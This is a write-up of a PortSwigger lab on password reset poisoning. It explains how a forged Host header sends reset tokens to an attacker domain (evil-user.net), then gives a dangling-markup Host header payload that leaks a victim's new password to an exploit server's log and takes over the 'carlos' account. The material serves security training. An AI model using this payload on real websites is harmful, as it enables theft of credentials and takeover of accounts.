## Password reset poisoning via dangling markup

**Title:** Password reset poisoning via dangling markup. [Go](https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-password-reset-poisoning-via-dangling-markup)

**Description:** This lab is vulnerable to password reset poisoning via dangling markup. To solve the lab, log in to Carlos's account.

You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server.

## Preface

Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into generating a password reset link pointing to a domain under their control. This behavior can be leveraged to steal the secret tokens required to reset arbitrary users' passwords and, ultimately, compromise their accounts.

**How does a password reset work?**

Virtually all websites that require a login also implement functionality that allows users to reset their password if they forget it. There are several ways of doing this, with varying degrees of security and practicality. One of the most common approaches goes something like this:

1. The user enters their username or email address and submits a password reset request.

2. The website checks that this user exists and then generates a temporary, unique, high-entropy token, which it associates with the user's account on the back-end.

3. The website sends an email to the user that contains a link for resetting their password. The user's unique reset token is included as a query parameter in the corresponding URL: `https://normal-website.com/reset?token=0a1b2c3d4e5f6g7h8i9j`. 

4. When the user visits this URL, the website checks whether the provided token is valid and uses it to determine which account is being reset. If everything is as expected, the user is given the option to enter a new password. Finally, the token is destroyed.

This process is simple enough and relatively secure in comparison to some other approaches. However, its security relies on the principle that only the intended user has access to their email inbox and, therefore, to their unique token. Password reset poisoning is a method of stealing this token in order to change another user's password.

**How to construct a password reset poisoning attack**

If the URL that is sent to the user is dynamically generated based on controllable input, such as the Host header, it may be possible to construct a password reset poisoning attack as follows:

1. The attacker obtains the victim's email address or username, as required, and submits a password reset request on their behalf. When submitting the form, they intercept the resulting HTTP request and modify the Host header so that it points to a domain that they control. For this example, we'll use `evil-user.net`.

2. The victim receives a genuine password reset email directly from the website. This seems to contain an ordinary link to reset their password and, crucially, contains a valid password reset token that is associated with their account. However, the domain name in the URL points to the attacker's server: `https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j`

3. If the victim clicks this link (or it is fetched in some other way, for example, by an antivirus scanner) the password reset token will be delivered to the attacker's server.

4. The attacker can now visit the real URL for the vulnerable website and supply the victim's stolen token via the corresponding parameter. They will then be able to reset the user's password to whatever they like and subsequently log in to their account.

In a real attack, the attacker may seek to increase the probability of the victim clicking the link by first warming them up with a fake breach notification, for example.

Even if you can't control the password reset link, you can sometimes use the Host header to inject HTML into sensitive emails. Note that email clients typically don't execute JavaScript, but other HTML injection techniques like dangling markup attacks may still apply.

## Methodology

### Finding the vulnerable parameter

While solving this lab we are interested in `POST /forgot-password` endpoint.

### My thought

After going to the login page and we requested a password reset for our own account. Then we went to the exploit server and opened the email client to find the password reset email. we observed that the link in the email simply points to the generic login page and the URL does not contain a password reset token. Instead, a new password is sent directly in the email body text. In the proxy history, after studying the response to the `GET /email` request. We observed that the HTML content for our email is written to a string, but this is being sanitized using the DOMPurify library before it is rendered by the browser. In the email client, notice that we have the option to view each email as raw HTML instead. Unlike the rendered version of the email, this does not appear to be sanitized in any way. Send the `POST /forgot-password` request to Burp Repeater. We noticed that tampering with the domain name in the Host header results in a server error. However, we are able to add an arbitrary, non-numeric port to the Host header and still reach the site as normal. Sending this request will still trigger a password reset email: `Host: OUR-LAB-ID.web-security-academy.net:arbitraryport`.

In the email client, we checked the raw version of our emails. We noticed that our injected port is reflected inside a link as an unescaped, single-quoted string. This is later followed by the new password. We sent the `POST /forgot-password` request again, but this time we used the port to break out of the string and inject a dangling-markup payload pointing to our exploit server: `Host: OUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?`. Now we should have received a new email in which most of the content is missing. After going to the exploit server and checking the access log we noticed that there is an entry for a request that begins `GET /?/login'>[...]`, which contains the rest of the email body, including the new password. In Burp Repeater, we sent the request one last time, but change the username parameter to `carlos`. Refreshing the access log and we obtained Carlos's new password from the corresponding log entry. Logging in as `carlos` using this new password to solve the lab.
